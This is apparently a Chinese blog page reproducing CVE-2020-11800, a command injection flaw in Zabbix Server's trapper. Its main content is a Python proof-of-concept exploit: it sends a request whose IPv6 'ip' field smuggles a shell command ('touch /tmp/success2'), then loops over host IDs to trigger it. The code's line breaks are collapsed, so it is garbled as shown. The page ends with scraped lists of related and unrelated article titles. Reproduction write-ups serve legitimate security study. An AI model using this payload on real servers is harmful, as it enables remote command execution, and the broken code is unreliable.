Zabbix Server trapper命令注入漏洞(CVE-2020-11800)
漏洞简介
Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix SIA zabbix3-proxy 3.0.31之前版本和zabbix3-server 3.0.31之前版本中存在安全漏洞。在CVE-2017-2824中,其Server端 trapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令。
漏洞复现
修改CVE-2017-2824的POC中的IP字段,构造新的POC:
import sys
import socket
import json
import sysdef send(ip, data):conn = socket.create_connection((ip, 10051), 10)conn.send(json.dumps(data).encode())data = conn.recv(2048)conn.close()return datatarget = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
for i in range(10000, 10500):data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})if data and b'failed' not in data:print('hostid: %d' % i)print(data)
当查看到如下结果时,则说明命令执行成功:
Zabbix Server trapper命令注入漏洞(CVE-2020-11800)相关推荐
- Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
文章目录 声明 一.漏洞简介 二.影响范围 三.环境搭建 四.本地实战 POC测试 反弹Shell 声明 本篇文章仅用于技术学习与漏洞复现,切勿用于非授权下的渗透测试行为,切记! 一.漏洞简介 Zab ...
- Zabbix Server trapper命令注入漏洞(CVE-2017-2824)
漏洞简介 Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统.该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位.解决存在的各种问题. Zabb ...
- (CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞
(CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞 20210508 一.漏洞简介 Zabbix 是由Alexei Vladishev 开发的一种网络监视.管理系 ...
- java 漏洞挖掘_Apache Tika命令注入漏洞挖掘
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...
- OpenSSH 命令注入漏洞通告(CVE-2020-15778,Openssh <=8.3p1)
一.漏洞概要 2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开.OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者 ...
- 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...
- openssh漏洞_技术干货 | OpenSSH命令注入漏洞复现(CVE202015778)
本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 欢迎各位添加 ...
- 对开源库 limdu 命令注入漏洞 (CVE-2020-4066) 的简要分析
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 开源库Limdu 的 trainBatch 函数中存在一个命令注入漏洞 (CVE-2020-4066). Limdu 是 Node.j ...
- 修改jar 注入_Apache Tika命令注入漏洞挖掘
介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤.CVE是https://nvd.nist.gov/vuln/detail/CVE-2018-1335.由于Apache ...
最新文章
- Egret之位图字体
- 开始《数据机构与算法之美》之旅
- HOWTO:将 IOCTL 发送到筛选器驱动程序
- Toast 使用方法大全
- bzoj4558[JLoi2016]方 容斥+count
- db powerdesigner设计mysql数据库表
- 2018年计算机数据结构试题答案,2018年数据结构期末考试题及答案.pdf
- 站群的建立,是一个长期的工作,一年时间吧
- php excel复选框,excel如何实现下拉框复选
- 虚拟机安装黑苹果【虚拟机安装,黑苹果安装,黑苹果无法全屏问题】(这应该全网最全的资源了吧~)
- (软考高级、高项)信息系统项目管理师(第三版)过关经验
- 网络通信中 TCP 产生 RST 的三个条件分析
- python入门教材 52pj_PJzhang:python基础入门的7个疗程-five
- QT软件开发之入门基础-搭建开发环境
- XSS(跨站脚本攻击)相关内容总结整理
- 网络技术领域专业术语解释大全-170个术语
- js replace将文字表情替换为图片
- 【计算机网络】数据链路层(完整版)
- 【Bug修复】yuv生成mp4格式文件帧数(时间)与原视频不一致
- 根据物料序列号获取最新的HU号码_SAP刘梦_新浪博客
热门文章
- K-means clustering using random matrix sparsification(ICML2018)
- 公司网页服务器访问超时,网站页面请求后台超时的相关咨询
- meta-inf文件夹以及MANIFEST.MF文件的作用
- NTFS文件结构实习笔记
- python求x的y次方logn_[转载]关于开14次方的计算方法
- Wol 网络远程唤醒技术,通过TP-LINK路由器远程一键开启电脑
- Ubuntu20.04 conda安出错,成功解决:solving environment:failed with initial frozen solve.Retrying with flexibl
- 联想服务器重装系统u盘启动不了怎么办,联想thinkpad无法进入u盘启动怎么办?
- Python 汉字转化成拼音
- PHP-中文转换成拼音